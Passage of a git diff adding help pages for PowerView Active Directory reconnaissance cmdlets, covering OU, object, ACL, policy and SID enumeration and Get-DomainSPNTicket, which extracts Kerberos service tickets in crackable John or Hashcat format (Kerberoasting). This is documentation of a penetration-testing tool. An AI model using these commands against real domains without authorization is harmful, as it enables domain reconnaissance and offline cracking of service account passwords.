+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md new file mode 100755 index 0000000..cc1fd39 --- /dev/null +++ b/docs/Recon/Get-DomainOU.md @@ -0,0 +1,316 @@ +# Get-DomainOU
+
+## SYNOPSIS
+Search for all organization units (OUs) or specific OU objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all OU objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainOU
+```
+
+Returns the current OUs in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU *admin* -Domain testlab.local
+```
+
+Returns all OUs with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all OUs with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+"*admin*","*server*" | Get-DomainOU
+```
+
+Search for OUs with the specific names.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return OUs with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.OU
+
+Custom PSObject with translated OU property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md new file mode 100755 index 0000000..f900c53 --- /dev/null +++ b/docs/Recon/Get-DomainObject.md @@ -0,0 +1,318 @@ +# Get-DomainObject
+
+## SYNOPSIS
+Return all (or specified) domain objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName
+
+## SYNTAX
+
+```
+Get-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObject -Domain testlab.local
+```
+
+Return all objects for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
+CN=dfm,CN=Users,DC=testlab,DC=local
+OU=OU3,DC=testlab,DC=local
+CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObject -Credential $Cred -Identity 'windows1'
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+
+distinguishedname
+-----------------
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ADObject
+
+Custom PSObject with translated AD object property fields.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md new file mode 100755 index 0000000..97f70cd --- /dev/null +++ b/docs/Recon/Get-DomainObjectAcl.md @@ -0,0 +1,251 @@ +# Get-DomainObjectAcl
+
+## SYNOPSIS
+Returns the ACLs associated with a specific active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
+
+## SYNTAX
+
+```
+Get-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
+```
+
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
+```
+
+Enumerate the ACL permissions for all OUs in the domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Rights
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md new file mode 100755 index 0000000..8b7d157 --- /dev/null +++ b/docs/Recon/Get-DomainPolicy.md @@ -0,0 +1,159 @@ +# Get-DomainPolicy
+
+## SYNOPSIS
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]
+ [-ResolveSids] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller using Get-DomainGPO.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainPolicy
+```
+
+Returns the domain policy for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainPolicy -Domain dev.testlab.local
+```
+
+Returns the domain policy for the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainPolicy -Source DC -Domain dev.testlab.local
+```
+
+Returns the policy for the dev.testlab.local domain controller.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicy -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for default policies, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Source
+Extract 'Domain' or 'DC' (domain controller) policies.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Domain
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResolveSids
+Switch.
+Resolve Sids from a DC policy to object names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### Hashtable
+
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md new file mode 100755 index 0000000..16c51ce --- /dev/null +++ b/docs/Recon/Get-DomainSID.md @@ -0,0 +1,102 @@ +# Get-DomainSID
+
+## SYNOPSIS
+Returns the SID for the current domain or the specified domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer
+
+## SYNTAX
+
+```
+Get-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the SID for the current domain or the specified domain by executing
+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
+to search for domain controllers through LDAP.
+The SID of the returned domain controller
+is then extracted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSID
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSID -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+A string representing the specified domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md new file mode 100755 index 0000000..70385a4 --- /dev/null +++ b/docs/Recon/Get-DomainSPNTicket.md @@ -0,0 +1,136 @@ +# Get-DomainSPNTicket
+
+## SYNOPSIS
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+### RawSPN (Default)
+```
+Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+### User
+```
+Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken.
+The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of John).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+```
+
+Request a kerberos service ticket for the specified SPN.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+```
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
+```
+
+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
+
+## PARAMETERS
+
+### -SPN
+Specifies the service principal name to request the ticket for.
+
+```yaml
+Type: String[]
+Parameter Sets: RawSPN
+Aliases: ServicePrincipalName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -User
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+```yaml
+Type: Object[]
+Parameter Sets: User
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+### PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
